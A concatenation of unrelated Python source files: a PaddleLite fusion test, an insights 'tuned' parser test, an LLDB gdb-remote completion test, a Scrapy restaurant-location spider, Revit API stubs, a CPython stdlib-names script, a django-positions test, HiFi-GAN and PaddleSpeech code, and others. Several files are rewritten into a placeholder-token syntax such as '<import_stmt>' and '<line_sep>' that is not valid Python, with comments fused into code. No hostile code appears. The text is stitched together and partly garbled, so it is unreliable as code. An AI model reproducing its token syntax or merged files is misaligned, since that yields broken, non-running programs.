# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')

from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st


def sample_program_configs(draw):
    # elementwise param
    in_shape_x = draw(st.lists(st.integers(min_value=1, max_value=20), min_size=4, max_size=4))
    in_shape_y = draw(st.lists(st.integers(min_value=1, max_value=20), min_size=4, max_size=4))
    assume((in_shape_x[0] == in_shape_y[0] or in_shape_x[0] == 1 or in_shape_y[0] == 1)
           and (in_shape_x[0] >= in_shape_y[0]))
    assume((in_shape_x[1] == in_shape_y[1] or in_shape_x[1] == 1 or in_shape_y[1] == 1)
           and (in_shape_x[1] >= in_shape_y[1]))
    assume((in_shape_x[2] == in_shape_y[2] or in_shape_x[2] == 1 or in_shape_y[2] == 1)
           and (in_shape_x[2] >= in_shape_y[2]))
    assume((in_shape_x[3] == in_shape_y[3] or in_shape_x[3] == 1 or in_shape_y[3] == 1)
           and (in_shape_x[3] >= in_shape_y[3]))
    axis = -1

    # scale param
    scale = draw(st.floats(min_value=0.5, max_value=5))
    bias = draw(st.floats(min_value=0, max_value=1))
    alpha = draw(st.floats(min_value=0, max_value=1))
    bias_after_scale = draw(st.sampled_from([False, True]))

    elementwise_op = OpConfig(
        type='elementwise_mul',
        inputs={"X": ["input_data_x"], "Y": ["input_data_y"]},
        outputs={"Out": ["elementwise_output_data"]},
        attrs={"data_format": 'nchw', "axis": axis})

    scale_op = OpConfig(
        type='scale',
        inputs={"X": ["elementwise_output_data"]},
        outputs={"Out": ["output_data"]},
        attrs={"scale": scale, "bias": bias, "alpha": alpha, "bias_after_scale": bias_after_scale})

    ops = [elementwise_op, scale_op]
    program_config = ProgramConfig(
        ops=ops,
        weights={},
        inputs={"input_data_x": TensorConfig(shape=in_shape_x),
                "input_data_y": TensorConfig(shape=in_shape_y)},
        outputs=["output_data"])
    return program_config
<import_stmt>pytest<import_stmt>doctest<import_from_stmt>insights.parsers SkipException tuned<import_from_stmt>insights.parsers.tuned Tuned<import_from_stmt>insights.tests context_wrap<line_sep>TUNED_OUTPUT=''' Available profiles: - balanced - desktop - latency-performance - network-latency - network-throughput - powersave - throughput-performance - virtual-guest - virtual-host Current active profile: virtual-guest '''.strip()<line_sep>TUNED_OUTPUT2=''' Available profiles: - balanced - desktop - latency-performance - network-latency - network-throughput - powersave - throughput-performance - virtual-guest - virtual-host It seems that tuned daemon is not running, preset profile is not activated. Preset profile: virtual-guest '''.strip()<line_sep>TUNED_OUTPUT3=''' Available profiles: - balanced - General non-specialized tuned profile - desktop - Optimize for the desktop use-case - hpc-compute - Optimize for HPC compute workloads - latency-performance - Optimize for deterministic performance at the cost of increased power consumption - network-latency - Optimize for deterministic performance at the cost of increased power consumption, focused on low latency network performance - network-throughput - Optimize for streaming network throughput, generally only necessary on older CPUs or 40G+ networks - powersave - Optimize for low power consumption - sap-netweaver - Optimize for SAP NetWeaver - throughput-performance - Broadly applicable tuning that provides excellent performance across a variety of common server workloads - virtual-guest - Optimize for running inside a virtual guest - virtual-guest-vmware - virtual-host - Optimize for running KVM guests Current active profile: virtual-guest-vmware '''.strip()<line_sep>TUNED_OUTPUT4=''' '''.strip()<def_stmt>test_active_profile <block_start>tuned_output=Tuned(context_wrap(TUNED_OUTPUT))<assert_stmt>len(tuned_output.get('available'))<eq>9<assert_stmt>tuned_output.get('active')<eq>'virtual-guest'<assert_stmt>tuned_output.get('available')<eq>['balanced' 'desktop' 'latency-performance' 'network-latency' 'network-throughput' 'powersave' 'throughput-performance' 'virtual-guest' 'virtual-host']<block_end><def_stmt>test_preset_profile <block_start>tuned_output=Tuned(context_wrap(TUNED_OUTPUT2))<assert_stmt>len(tuned_output.get('available'))<eq>9<assert_stmt>tuned_output.get('preset')<eq>'virtual-guest'<assert_stmt>tuned_output.get('available')<eq>['balanced' 'desktop' 'latency-performance' 'network-latency' 'network-throughput' 'powersave' 'throughput-performance' 'virtual-guest' 'virtual-host']<block_end><def_stmt>test_tuned_profile <block_start>tuned_output=Tuned(context_wrap(TUNED_OUTPUT3))<assert_stmt>len(tuned_output.get('available'))<eq>12<assert_stmt>tuned_output.get('preset')<is><none><assert_stmt>tuned_output.get('active')<eq>'virtual-guest-vmware'<assert_stmt>'sap-netweaver'<in>tuned_output.get('available')<assert_stmt>'virtual-guest-vmware'<in>tuned_output.get('available')<with_stmt>pytest.raises(SkipException)<block_start>Tuned(context_wrap(''))<block_end><block_end><def_stmt>test_doc_example <block_start>env={'tuned':Tuned(context_wrap(TUNED_OUTPUT))}<line_sep>failed,total=doctest.testmod(tuned globs=env)<assert_stmt>failed<eq>0<block_end>
import tempfile
import gdbremote_testcase
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
from lldbgdbserverutils import *


class GdbRemoteCompletionTestCase(gdbremote_testcase.GdbRemoteTestCaseBase):
    mydir = TestBase.compute_mydir(__file__)

    def init_lldb_server(self):
        self.debug_monitor_exe = get_lldb_server_exe()
        if not self.debug_monitor_exe:
            self.skipTest("lldb-server exe not found")
        port_file = tempfile.NamedTemporaryFile().name
        commandline_args = ["platform", "--listen", "*:0", "--socket-file", port_file]
        server = self.spawnSubprocess(
            get_lldb_server_exe(),
            commandline_args,
            install_remote=False)
        self.assertIsNotNone(server)

        self.stub_hostname = "localhost"
        self.port = int(lldbutil.wait_for_file_on_target(self, port_file))
        self.sock = self.create_socket()
        self._server = Server(self.sock, server)

        self.add_no_ack_remote_stream()

    def generate_hex_path(self, target):
        return str(os.path.join(self.getBuildDir(), target)).encode().hex()

    @add_test_categories(["llgs"])
    def test_autocomplete_path(self):
        self.build()
        self.init_lldb_server()

        # Test file-included completion when flag is set to 0.
        self.test_sequence.add_log_lines(
            ["read packet: $qPathComplete:0,{}#00".format(
                self.generate_hex_path("main")),
             "send packet: $M{},{}#00".format(
                self.generate_hex_path("main.d"),
                self.generate_hex_path("main.o"))
             ], True)

        # Test directory-only completion when flag is set to 1.
        os.makedirs(os.path.join(self.getBuildDir(), "test"))
        self.test_sequence.add_log_lines(
            ["read packet: $qPathComplete:1,{}#00".format(
                self.generate_hex_path("tes")),
             "send packet: $M{}{}#00".format(
                self.generate_hex_path("test"),
                os.path.sep.encode().hex())  # "test/" or "test\".
             ], True)

        self.expect_gdbremote_sequence()
# -*- coding: utf-8 -*-
import json
import re

import scrapy

from locations.items import GeojsonPointItem
from locations.hours import OpeningHours

DAY_MAPPING = {'Monday': 'Mo', 'Tuesday': 'Tu', 'Wednesday': 'We', 'Thursday': 'Th',
               'Friday': 'Fr', 'Saturday': 'Sa', 'Sunday': 'Su'}


class BoneFishGrillSpider(scrapy.Spider):
    download_delay = 0.2
    name = "bonefishgrill"
    allowed_domains = ["bonefishgrill.com"]
    start_urls = (
        'https://www.bonefishgrill.com/locations/all',
    )

    def parse(self, response):
        urls = response.xpath('//li[@class="location-row"]/a/@href').extract()
        for url in urls:
            yield scrapy.Request(response.urljoin(url), callback=self.parse_location)

    def parse_location(self, response):
        data = response.xpath('//script[contains(text(), "initLocationDetail")][1]/text()').extract_first()
        try:
            properties = {
                'ref': re.search(r'"UnitId":"(.*?)"', data).group(1),
                'name': re.search(r'"City":"(.*?)"', data).group(1),
                'addr_full': re.search(r'"Address":"(.*?)"', data).group(1),
                'city': re.search(r'"City":"(.*?)"', data).group(1),
                'state': re.search(r'"State":"(.*?)"', data).group(1),
                'postcode': re.search(r'"Zip":"(.*?)"', data).group(1),
                'phone': re.search(r'"Phone":"(.*?)"', data).group(1),
                'lat': re.search(r'"Latitude":"(.*?)"', data).group(1),
                'lon': re.search(r'"Longitude":"(.*?)"', data).group(1),
                'website': response.url,
            }

            hours = self.parse_hours(re.search(r'"Hours":(.*?})', data).group(1))
            if hours:
                properties['opening_hours'] = hours

            yield GeojsonPointItem(**properties)
        except:
            pass

    def parse_hours(self, response):
        opening_hours = OpeningHours()
        weekdays = response
        hrs = json.loads(weekdays)
        WEEKDAYS = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
        for DAY in WEEKDAYS:
            open = hrs.get(DAY + 'Open')
            close = hrs.get(DAY + 'Close')
            opening_hours.add_range(day=DAY_MAPPING[DAY],
                                    open_time=open,
                                    close_time=close,
                                    time_format='%H:%M %p')
        return opening_hours.as_opening_hours()
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration test program for Subpar

Tests file extraction functionality (zip_safe=False)
"""

import os
import pkgutil
import sys


def main():
    print('In extract.py main()')

    # Test that imports are from real files on disk.  Slightly tricky
    # to test, since the 'subpar' package is imported before we
    # extract and setup sys.path, so we can't "import subpar.test.something"
    import extract_helper
    assert os.path.isfile(extract_helper.__file__), (
        extract_helper.__file__, sys.path)
    import extract_helper_package
    assert os.path.isfile(extract_helper_package.__file__), (
        extract_helper_package.__file__, sys.path)

    # Test resource extraction
    dat = pkgutil.get_data('extract_helper_package', 'extract_dat.txt')
    assert (dat == b'Dummy data file for extract.py\n'), dat


if __name__ == '__main__':
    main()
class CurveLoopIterator(object, IEnumerator[Curve], IDisposable, IEnumerator):
    """ An iterator to a curve loop. """

    def Dispose(self):
        """ Dispose(self: CurveLoopIterator) """
        pass

    def MoveNext(self):
        """
        MoveNext(self: CurveLoopIterator) -> bool

        Increments the iterator to the next item.

        Returns: True if there is a next available item in this iterator. False if the
            iterator has completed all available items.
        """
        pass

    def next(self, *args):
        """ next(self: object) -> object """
        pass

    def ReleaseUnmanagedResources(self, *args):
        """ ReleaseUnmanagedResources(self: CurveLoopIterator, disposing: bool) """
        pass

    def Reset(self):
        """
        Reset(self: CurveLoopIterator)

        Resets the iterator to the initial state.
        """
        pass

    def __contains__(self, *args):
        """ __contains__[Curve](enumerator: IEnumerator[Curve], value: Curve) -> bool """
        pass

    def __enter__(self, *args):
        """ __enter__(self: IDisposable) -> object """
        pass

    def __exit__(self, *args):
        """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
        pass

    def __init__(self, *args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass

    def __iter__(self, *args):
        """ __iter__(self: IEnumerator) -> object """
        pass

    def __repr__(self, *args):
        """ __repr__(self: object) -> str """
        pass

    Current = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """Gets the item at the current position of the iterator.

    Get: Current(self: CurveLoopIterator) -> Curve
    """

    IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """Specifies whether the .NET object represents a valid Revit entity.

    Get: IsValidObject(self: CurveLoopIterator) -> bool
    """
# This script lists the names of standard library modules # to update Python/stdlib_mod_names.h <import_stmt>_imp<import_stmt>os.path<import_stmt>re<import_stmt>subprocess<import_stmt>sys<import_stmt>sysconfig<line_sep>SRC_DIR=os.path.dirname(os.path.dirname(os.path.dirname(__file__)))<line_sep>STDLIB_PATH=os.path.join(SRC_DIR 'Lib')<line_sep>MODULES_SETUP=os.path.join(SRC_DIR 'Modules' 'Setup')<line_sep>SETUP_PY=os.path.join(SRC_DIR 'setup.py')<line_sep>IGNORE={'__init__' '__pycache__' 'site-packages' # Test modules and packages '__hello__' '__phello__' '__hello_alias__' '__phello_alias__' '__hello_only__' '_ctypes_test' '_testbuffer' '_testcapi' '_testconsole' '_testimportmultiple' '_testinternalcapi' '_testmultiphase' '_xxsubinterpreters' '_xxtestfuzz' 'distutils.tests' 'idlelib.idle_test' 'lib2to3.tests' 'test' 'xxlimited' 'xxlimited_35' 'xxsubtype' }<line_sep># Windows extension modules WINDOWS_MODULES=('_msi' '_overlapped' '_testconsole' '_winapi' 'msvcrt' 'nt' 'winreg' 'winsound')<line_sep># macOS extension modules MACOS_MODULES=('_scproxy' )<line_sep># Pure Python modules (Lib/*.py) <def_stmt>list_python_modules names<block_start><for_stmt>filename os.listdir(STDLIB_PATH)<block_start><if_stmt><not>filename.endswith(".py")<block_start><continue><block_end>name=filename.removesuffix(".py")<line_sep>names.add(name)<block_end><block_end># Packages in Lib/ <def_stmt>list_packages names<block_start><for_stmt>name os.listdir(STDLIB_PATH)<block_start><if_stmt>name<in>IGNORE<block_start><continue><block_end>package_path=os.path.join(STDLIB_PATH name)<if_stmt><not>os.path.isdir(package_path)<block_start><continue><block_end><if_stmt>any(package_file.endswith(".py")<for>package_file os.listdir(package_path))<block_start>names.add(name)<block_end><block_end><block_end># Extension modules built by setup.py <def_stmt>list_setup_extensions names<block_start>cmd=[sys.executable SETUP_PY "-q" "build" "--list-module-names"]<line_sep>output=subprocess.check_output(cmd)<line_sep>output=output.decode("utf8")<line_sep>extensions=output.splitlines()<line_sep>names<augor>set(extensions)<block_end># Built-in and extension modules built by Modules/Setup <def_stmt>list_modules_setup_extensions names<block_start>assign_var=re.compile("^[A-Z]+=")<with_stmt>open(MODULES_SETUP encoding="utf-8")<as>modules_fp<block_start><for_stmt>line modules_fp# Strip comment <block_start>line=line.partition("#")[0]<line_sep>line=line.rstrip()<if_stmt><not>line<block_start><continue><block_end><if_stmt>assign_var.match(line)# Ignore "VAR=VALUE" <block_start><continue><block_end><if_stmt>line<in>("*disabled*" "*shared*")<block_start><continue><block_end>parts=line.split()<if_stmt>len(parts)<l>2<block_start><continue><block_end># "errno errnomodule.c" => write "errno" name=parts[0]<line_sep>names.add(name)<block_end><block_end><block_end># List frozen modules of the PyImport_FrozenModules list (Python/frozen.c). # Use the "./Programs/_testembed list_frozen" command. <def_stmt>list_frozen names<block_start>submodules=set()<for_stmt>name _imp._frozen_module_names()# To skip __hello__, __hello_alias__ and etc. <block_start><if_stmt>name.startswith('__')<block_start><continue><block_end><if_stmt>'.'<in>name<block_start>submodules.add(name)<block_end><else_stmt><block_start>names.add(name)<block_end><block_end># Make sure all frozen submodules have a known parent. 
<for_stmt>name list(submodules)<block_start><if_stmt>name.partition('.')[0]<in>names<block_start>submodules.remove(name)<block_end><block_end><if_stmt>submodules<block_start><raise>Exception(f'unexpected frozen submodules: {sorted(submodules)}')<block_end><block_end><def_stmt>list_modules <block_start>names=set(sys.builtin_module_names)|set(WINDOWS_MODULES)|set(MACOS_MODULES)<line_sep>list_modules_setup_extensions(names)<line_sep>list_setup_extensions(names)<line_sep>list_packages(names)<line_sep>list_python_modules(names)<line_sep>list_frozen(names)<line_sep># Remove ignored packages and modules <for_stmt>name list(names)<block_start>package_name=name.split('.')[0]<line_sep># package_name can be equal to name <if_stmt>package_name<in>IGNORE<block_start>names.discard(name)<block_end><block_end><for_stmt>name names<block_start><if_stmt>"."<in>name<block_start><raise>Exception("sub-modules must not be listed")<block_end><block_end><return>names<block_end><def_stmt>write_modules fp names<block_start>print("// Auto-generated by Tools/scripts/generate_stdlib_module_names.py." file=fp)<line_sep>print("// List used to create sys.stdlib_module_names." file=fp)<line_sep>print(file=fp)<line_sep>print("static const char* _Py_stdlib_module_names[] = {" file=fp)<for_stmt>name sorted(names)<block_start>print(f'"{name}",' file=fp)<block_end>print("};" file=fp)<block_end><def_stmt>main <block_start><if_stmt><not>sysconfig.is_python_build()<block_start>print(f"ERROR: {sys.executable} is not a Python build" file=sys.stderr)<line_sep>sys.exit(1)<block_end>fp=sys.stdout<line_sep>names=list_modules()<line_sep>write_modules(fp names)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
import pyb

print("Executing main.py")

led = pyb.LED(1)
led.on()
pyb.delay(100)
led.off()
pyb.delay(100)
led.on()
pyb.delay(100)
led.off()
<import_stmt>time<import_stmt>doctest<import_stmt>unittest<import_from_stmt>examples.lists.models List Item<import_from_stmt>django.test TestCase<class_stmt>GenericTestCase(TestCase)<block_start><def_stmt>setUp self<block_start><pass><block_end><def_stmt>tearDown self<block_start><pass><block_end># @unittest.skip("Some reason. If you are reading this in a test run someone did not fill this in.") <def_stmt>test_doctests_standin self# This code just contains the old doctests for this module. They should be most likely split out into their own # tests at some point. <block_start>self.l=List.objects.create(name='To Do')<line_sep># create a couple items using the default position result=self.l.items.create(name='Write Tests').name<line_sep>expected_result='Write Tests'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position'))<line_sep>expected_result=[(u'Write Tests' 0)]<line_sep>self.assertEqual(result expected_result)<line_sep>result=self.l.items.create(name='Exercise').name<line_sep>expected_result='Exercise'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Write Tests' 0) (u'Exercise' 1)]<line_sep>self.assertEqual(result expected_result)<line_sep># create an item with an explicit position result=self.l.items.create(name='Learn to spell Exercise' position=0).name<line_sep>expected_result='Learn to spell Exercise'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Learn to spell Exercise' 0) (u'Write Tests' 1) (u'Exercise' 2)]<line_sep>self.assertEqual(result expected_result)<line_sep># save an item without changing it's position self.exercise=self.l.items.order_by('-position')[0]<line_sep>self.exercise.name='Exercise'<line_sep>self.exercise.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Learn to spell Exercise' 0) (u'Write Tests' 1) (u'Exercise' 2)]<line_sep>self.assertEqual(result expected_result)<line_sep># delete an item self.learn_to_spell=self.l.items.order_by('position')[0]<line_sep>self.learn_to_spell.delete()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Write Tests' 0) (u'Exercise' 1)]<line_sep>self.assertEqual(result expected_result)<line_sep># create a couple more items result=self.l.items.create(name='Drink less Coke').name<line_sep>expected_result='Drink less Coke'<line_sep>self.assertEqual(result expected_result)<line_sep>result=self.l.items.create(name='Go to Bed').name<line_sep>expected_result='Go to Bed'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Write Tests' 0) (u'Exercise' 1) (u'Drink less Coke' 2) (u'Go to Bed' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item to end using None self.write_tests=self.l.items.order_by('position')[0]<line_sep>self.write_tests.position=<none><line_sep>self.write_tests.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Exercise' 0) (u'Drink less Coke' 1) (u'Go to Bed' 2) (u'Write Tests' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item using negative index 
self.write_tests.position=-3<line_sep>self.write_tests.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Exercise' 0) (u'Write Tests' 1) (u'Drink less Coke' 2) (u'Go to Bed' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item to position self.write_tests.position=2<line_sep>self.write_tests.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Exercise' 0) (u'Drink less Coke' 1) (u'Write Tests' 2) (u'Go to Bed' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item to beginning self.sleep=self.l.items.order_by('-position')[0]<line_sep>self.sleep.position=0<line_sep>self.sleep.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Exercise' 1) (u'Drink less Coke' 2) (u'Write Tests' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># check auto_now updates time.sleep(1)# sleep to guarantee updated time increases sleep_updated,exercise_updated,eat_better_updated,write_tests_updated=[i.updated<for>i self.l.items.order_by('position')]<line_sep>self.eat_better=self.l.items.order_by('-position')[1]<line_sep>self.eat_better.position=1<line_sep>self.eat_better.save()<line_sep>self.todo_list=list(self.l.items.order_by('position'))<line_sep>self.assertEqual(sleep_updated self.todo_list[0].updated)<line_sep>self.assertLessEqual(eat_better_updated self.todo_list[1].updated)<line_sep>self.assertLessEqual(exercise_updated self.todo_list[2].updated)<line_sep># create an item using negative index # http://github.com/jpwatts/django-positions/issues/#issue/5 result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Drink less Coke' 1) (u'Exercise' 2) (u'Write Tests' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep>self.fix_issue_5=Item(list=self.l name="Fix Issue #5")<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=-1<line_sep>self.assertEqual(result expected_result)<line_sep>self.fix_issue_5.position=-2<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=-2<line_sep>self.assertEqual(result expected_result)<line_sep>self.fix_issue_5.save()<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=3<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Drink less Coke' 1) (u'Exercise' 2) (u'Fix Issue #5' 3) (u'Write Tests' 4)]<line_sep>self.assertEqual(result expected_result)<line_sep># Try again, now that the model has been saved. 
self.fix_issue_5.position=-2<line_sep>self.fix_issue_5.save()<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=3<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Drink less Coke' 1) (u'Exercise' 2) (u'Fix Issue #5' 3) (u'Write Tests' 4)]<line_sep>self.assertEqual(result expected_result)<line_sep># create an item using with a position of zero # http://github.com/jpwatts/django-positions/issues#issue/7 self.item0=self.l.items.create(name="Fix Issue #7" position=0)<line_sep>result=self.item0.position<line_sep>expected_result=0<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Fix Issue #7' 0) (u'Go to Bed' 1) (u'Drink less Coke' 2) (u'Exercise' 3) (u'Fix Issue #5' 4) (u'Write Tests' 5)]<line_sep>self.assertEqual(result expected_result)<block_end><block_end>
config = {
    'sampling_rate': 22050,
    'hop_size': 256,
    'model_type': 'hifigan_generator',
    'hifigan_generator_params': {
        'out_channels': 1,
        'kernel_size': 7,
        'filters': 128,
        'use_bias': True,
        'upsample_scales': [8, 8, 2, 2],
        'stacks': 3,
        'stack_kernel_size': [3, 7, 11],
        'stack_dilation_rate': [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
        'use_final_nolinear_activation': True,
        'is_weight_norm': False,
    },
    'hifigan_discriminator_params': {
        'out_channels': 1,
        'period_scales': [2, 3, 5, 7, 11],
        'n_layers': 5,
        'kernel_size': 5,
        'strides': 3,
        'filters': 8,
        'filter_scales': 4,
        'max_filters': 512,
        'is_weight_norm': False,
    },
    'melgan_discriminator_params': {
        'out_channels': 1,
        'scales': 3,
        'downsample_pooling': 'AveragePooling1D',
        'downsample_pooling_params': {'pool_size': 4, 'strides': 2},
        'kernel_sizes': [5, 3],
        'filters': 16,
        'max_downsample_filters': 512,
        'downsample_scales': [4, 4, 4, 4],
        'nonlinear_activation': 'LeakyReLU',
        'nonlinear_activation_params': {'alpha': 0.2},
        'is_weight_norm': False,
    },
    'stft_loss_params': {
        'fft_lengths': [1024, 2048, 512],
        'frame_steps': [120, 240, 50],
        'frame_lengths': [600, 1200, 240],
    },
    'lambda_feat_match': 10.0,
    'lambda_adv': 4.0,
    'batch_size': 16,
    'batch_max_steps': 8192,
    'batch_max_steps_valid': 81920,
    'remove_short_samples': True,
    'allow_cache': True,
    'is_shuffle': True,
}
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>argparse<import_stmt>numpy<as>np<import_stmt>paddle<import_stmt>pandas<as>pd<import_stmt>yaml<import_from_stmt>paddle nn<import_from_stmt>paddle.io DataLoader<import_from_stmt>sklearn.metrics classification_report<import_from_stmt>sklearn.metrics precision_recall_fscore_support<import_from_stmt>yacs.config CfgNode<import_from_stmt>paddlespeech.text.models.ernie_linear ErnieLinear<import_from_stmt>paddlespeech.text.models.ernie_linear PuncDataset<import_from_stmt>paddlespeech.text.models.ernie_linear PuncDatasetFromErnieTokenizer<line_sep>DefinedClassifier={'ErnieLinear':ErnieLinear }<line_sep>DefinedLoss={"ce":nn.CrossEntropyLoss }<line_sep>DefinedDataset={'Punc':PuncDataset 'Ernie':PuncDatasetFromErnieTokenizer }<def_stmt>evaluation y_pred y_test<block_start>precision,recall,f1,_=precision_recall_fscore_support(y_test y_pred average=<none> labels=[1 2 3])<line_sep>overall=precision_recall_fscore_support(y_test y_pred average='macro' labels=[1 2 3])<line_sep>result=pd.DataFrame(np.array([precision recall f1]) columns=list(['O' 'COMMA' 'PERIOD' 'QUESTION'])[1:] index=['Precision' 'Recall' 'F1'])<line_sep>result['OVERALL']=overall[:3]<line_sep><return>result<block_end><def_stmt>test args<block_start><with_stmt>open(args.config)<as>f<block_start>config=CfgNode(yaml.safe_load(f))<block_end>print("========Args========")<line_sep>print(yaml.safe_dump(vars(args)))<line_sep>print("========Config========")<line_sep>print(config)<line_sep>test_dataset=DefinedDataset[config["dataset_type"]](train_path=config["test_path"] **config["data_params"])<line_sep>test_loader=DataLoader(test_dataset batch_size=config.batch_size shuffle=<false> drop_last=<false>)<line_sep>model=DefinedClassifier[config["model_type"]](**config["model"])<line_sep>state_dict=paddle.load(args.checkpoint)<line_sep>model.set_state_dict(state_dict["main_params"])<line_sep>model.eval()<line_sep>punc_list=[]<for_stmt>i range(len(test_loader.dataset.id2punc))<block_start>punc_list.append(test_loader.dataset.id2punc[i])<block_end>test_total_label=[]<line_sep>test_total_predict=[]<for_stmt>i,batch enumerate(test_loader)<block_start>input,label=batch<line_sep>label=paddle.reshape(label shape=[-1])<line_sep>y,logit=model(input)<line_sep>pred=paddle.argmax(logit axis=1)<line_sep>test_total_label.extend(label.numpy().tolist())<line_sep>test_total_predict.extend(pred.numpy().tolist())<block_end>t=classification_report(test_total_label test_total_predict target_names=punc_list)<line_sep>print(t)<line_sep>t2=evaluation(test_total_label test_total_predict)<line_sep>print('=========================================================')<line_sep>print(t2)<block_end><def_stmt>main # parse args and config and redirect to train_sp <block_start>parser=argparse.ArgumentParser(description="Test a ErnieLinear model.")<line_sep>parser.add_argument("--config" type=str help="ErnieLinear config file.")<line_sep>parser.add_argument("--checkpoint" type=str 
help="snapshot to load.")<line_sep>parser.add_argument("--ngpu" type=int default=1 help="if ngpu=0, use cpu.")<line_sep>args=parser.parse_args()<if_stmt>args.ngpu<eq>0<block_start>paddle.set_device("cpu")<block_end><elif_stmt>args.ngpu<g>0<block_start>paddle.set_device("gpu")<block_end><else_stmt><block_start>print("ngpu should >= 0 !")<block_end>test(args)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
"""dummy_exporter.py Dummy exporter implementation for testing. """<line_sep># pylint: disable=missing-class-docstring <import_from_stmt>slo_generator.exporters.base MetricsExporter<class_stmt>FailExporter(MetricsExporter)<block_start><def_stmt>export_metric self data<block_start><raise>ValueError("Oops !")<block_end><block_end>
class GridNode(object):
    """
    A structure that represents a particular location in (U,V) from a grid.

    GridNode(uIndex: int, vIndex: int)
    """

    @staticmethod
    def __new__(self, uIndex, vIndex):
        """
        __new__[GridNode]() -> GridNode

        __new__(cls: type, uIndex: int, vIndex: int)
        """
        pass

    UIndex = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """The node's index along the U axis.

    Get: UIndex(self: GridNode) -> int

    Set: UIndex(self: GridNode) = value
    """

    VIndex = property(lambda self: object(), lambda self, v: None, lambda self: None)
    """The node's index along the V axis.

    Get: VIndex(self: GridNode) -> int

    Set: VIndex(self: GridNode) = value
    """
